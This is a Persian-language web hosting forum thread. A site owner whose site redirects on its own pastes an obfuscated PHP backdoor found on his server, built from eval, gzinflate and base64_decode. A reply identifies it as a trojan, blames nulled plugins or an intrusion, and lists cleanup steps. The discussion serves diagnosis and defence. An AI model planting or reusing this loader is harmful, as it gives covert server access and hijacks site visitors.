رفتن به مطلب

ریدایکت سایت به صورت خودکار


AmiRoo

پست های پیشنهاد شده

دروددوستان سایتم به طور خودکار ریدایکت میشد به آدرس دیگه ,الان چک کردم داخل هاست یک فایل با نام " 4gmhx4y5p6.php " ایجاد شده

<?php


eval("\n\$dgreusdi = intval(__LINE__) * 337;");

$a = "7VdrT+NGFP1eqf9hiCIcKwHFj7ClIQh2Bd1V6bIthVZC1Jo4k2QSvzR2674raF/94zDk78GLOou5W6Uo2M7Zlzz33MnTs3JzzgTsySlsa674CIXjhROtQ95fX1zo/W+/IbhONgjMOSkqBqRbnffpvcPumbtIeBg4CfdZAQdMOuh43OdJK52Qf3KySaNIh674vqxWRAzvFg/WxqHApG3SlpNZ03l5c/vjsjNCZNNwznnDlhwAbH2UeyCvW1zF/rR4U5h9zwpyCfBnTChMODJU+otD+HhpIiOk8pmB8u4RNL674iZazpDG7MB2RswNR6y1ReodlZIsNvLavv674xyUtuJ3JuyWuIwMxzDI/r18dN5BaBm7rCfcnFHJ8ltFUNkWDJQgSkZHvj+vSnn2+M8OJs8vri+jR+e2YYV7+vTj9cee9vbk57b65XZxfXhvHDL97k9W/n7942Mm+qBsAZFoycOB6748mMSpc/hGSNYjtSY9AckfGbKsQYZqpxKrHF674uez5cXv36lDsByIaLROaOYDGjwp3Wh7mYQRm+XwSVROryKVNcyKd/L6eqltXmlsJxeZVzLI2+mr42/Xw6Z068GPo8jvHdakYsjDzWkQHxPDoMBU2YYuciXGMu/LVvDHFpNApxw9rCGT7o9kmTHyFBPLYh1/v1C7qWm6Vys41c3hayu6uiBLzdhtm83f505JrsPmGBdNiJqKA+7A/FKCO7bfI7HXmdDuVU3zZnd3olO9ThKI/s6743cqWmW95Xx4LKxYdcsVSZUbDuuIer9No1uNzjW48/BAdlqlvV6sPR2ijcZLymcRG9MZW0XjGT2cz674aTWcgmfDaK4nA0GzNN18lgQCoanq/up0LQj61cFZIPhrOkIhaveJIWhbwC8JeW0cXGIw3e+F6xGlQqqyitQm61aKndAXgSTaMl674+kOeA4er+Gasd/dMzQFkLnTUJ6mglOP/ykLghRUUao279onpvKJIRCFkIy0u5fQ5jKK3eNk3+ZvtRYUS1tzRBOKDTVnH2vPgJNFsPU1dgVjQaGY5CgKB1BFtUIW7w46745UG674N5miihTDFNajUsQ2sl8o4fuKzahSmje29sAtnxk8iBaJwrfhYjxmIiutm+Fk6G1Su7j+e0bnc+//AOGBWfq2OqSHsZ582iXCXg+DB7hf4f4O9y674674urg/oQQQ/DdLbNBggwPiHQJC8IHOkFiADdhgAG674AYgBjAGQAZQBmHJaYTAiZUgO674TAiZ674DJ79faYIDNBZoLMhFKrWzYNIAtkFsgskFkgsyBkQciCkAUhG0pt4GzgbOkLcDZwNnD2qxKhDS674bQj0I9b7aZPmf8Ksj1FV9Iipa2imSI5I1duuy2Cd6pecfpmhF74zSeJs2bals2sbdkZ2BVKrsAiVRjdQu6d6fn+vk6AgbvL5Lk5fsYpT0a674UVJ7T8ocGDBauSltwMFn6do5y0iVGJVdoZV7xpGy+IAv49kJYiFmvpfDRMZYM674YyveVlza2G6+1Hbzs2w3S7YffAHTrZeabr3Y9DrhJ8v/sc2rKfcY6GUiHZOu2gw33QPDJ2VdXDo5PsbpplL71JLsD9IfM67StC674iPSDlPZNZvbf3/GaSMR4QW93BZj+D1mZkDdbf";
$a = str_replace($dgreusdi, "E", $a);
eval (gzinflate(base64_decode($a)));

با محتویات بالا ممنونم یشم بگید بخاطر استفاده از چی بوده و مربوط به چه سایتی هست

 

میشه فهمید از چه طریقی اضافه شده؟

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر

یک فایل دیگه با نام " .htaccess.171205052320.orig " و " .listing " ایجاد شدن که قابل ویرایش نیستن ( 4gmhx4y5p6.php ) بود اما این 2تا خیر...

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر

درود.

همون کد اول رو اگه به صورت یک فایل php ذیره کنید داخل سیستم، آنتی ویروس اونو به عنوان تروجان شناسایی می کنه!

مشکل از افزونه هایی هست نال شدن. نال کننده ها گاهی اوقات ممکنه کدهای مخرب رو داخل افزونه های در حال انتشار قرار بدن.

متاسفانه برای فهمیدن اینکه کدوم افزونه مشکل ساز هست، باید کدنویسی رو تک تک چک کرد و هر مورد مشکوکی رو حذف کرد از افزونه.

 

گاهی اوقات هم هکرها زمانی که سایت رو هک می کنند و از طریقی تونستند نفوذ کنند، یک فایل مانند این کدهایی که گفتید تحت نام Backdoor قرار میدن تا دسترسی داشته باشند!

در پنل هاستتون از امکان آنتی ویروس استفاده کنید و یکبار کل هاست و فایل ها رو اسکن کنید. اگر وردپرس هست سایتتون، از افزونه های امنیتی مانند Wordfence استفاده کنید و کل سایت و فایل ها رو اسکن کنید. موارد مشکوک احتمال داره مشخص بشن (اگه مشکل از کدهای مخرب افزونه ها باشه)

راه حل پیشنهادی:

  1. از دیتابیس سایت بک آپ بگیرید
  2. بک آپ جداگانه ای از افزونه ها و قالب هاتون بگیرید.
  3. CMS رو مجددا نصب کنید.
  4. قالب ها و افزونه ها رو تا حد امکان از منابع معتبر دانلود کنید.
  5. در نهایت اگر باز هم چنین مشکلی پیش اومد، مشکل از افزونه هاتون هست که باید یک متخصص امنیت سایتتون رو در قبال هزینه ی بالا آنالیز کنه

 

موفق باشید

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر

در در 20 مرداد 1397 در 14:00، Masih گفته است :

درود.

همون کد اول رو اگه به صورت یک فایل php ذیره کنید داخل سیستم، آنتی ویروس اونو به عنوان تروجان شناسایی می کنه!

مشکل از افزونه هایی هست نال شدن. نال کننده ها گاهی اوقات ممکنه کدهای مخرب رو داخل افزونه های در حال انتشار قرار بدن.

متاسفانه برای فهمیدن اینکه کدوم افزونه مشکل ساز هست، باید کدنویسی رو تک تک چک کرد و هر مورد مشکوکی رو حذف کرد از افزونه.

 

گاهی اوقات هم هکرها زمانی که سایت رو هک می کنند و از طریقی تونستند نفوذ کنند، یک فایل مانند این کدهایی که گفتید تحت نام Backdoor قرار میدن تا دسترسی داشته باشند!

در پنل هاستتون از امکان آنتی ویروس استفاده کنید و یکبار کل هاست و فایل ها رو اسکن کنید. اگر وردپرس هست سایتتون، از افزونه های امنیتی مانند Wordfence استفاده کنید و کل سایت و فایل ها رو اسکن کنید. موارد مشکوک احتمال داره مشخص بشن (اگه مشکل از کدهای مخرب افزونه ها باشه)

راه حل پیشنهادی:

  1. از دیتابیس سایت بک آپ بگیرید
  2. بک آپ جداگانه ای از افزونه ها و قالب هاتون بگیرید.
  3. CMS رو مجددا نصب کنید.
  4. قالب ها و افزونه ها رو تا حد امکان از منابع معتبر دانلود کنید.
  5. در نهایت اگر باز هم چنین مشکلی پیش اومد، مشکل از افزونه هاتون هست که باید یک متخصص امنیت سایتتون رو در قبال هزینه ی بالا آنالیز کنه

 

موفق باشید

ممنون ,جالبه فقط روی بعضی سیستم ها اونم فقط موزیلا این طوری میشه الان هم میشه اما روی 2تا سیستم دیدم من بقیه سیستم ها نه !

چک کنید شما : belowfood.com

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر

در 2 ساعت قبل، AmiRoo گفته است :

ممنون ,جالبه فقط روی بعضی سیستم ها اونم فقط موزیلا این طوری میشه الان هم میشه اما روی 2تا سیستم دیدم من بقیه سیستم ها نه !

چک کنید شما : belowfood.com

درود مجدد.

چک کردم با موزیلا ، کروم و IE و Edge هیچ مشکلی نبود و سایت به خوبی باز شد.

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر

بایگانی شده

این موضوع بایگانی و قفل شده و دیگر امکان ارسال پاسخ نیست.

مهمان
این موضوع برای عدم ارسال قفل گردیده است.
×
×
  • اضافه کردن...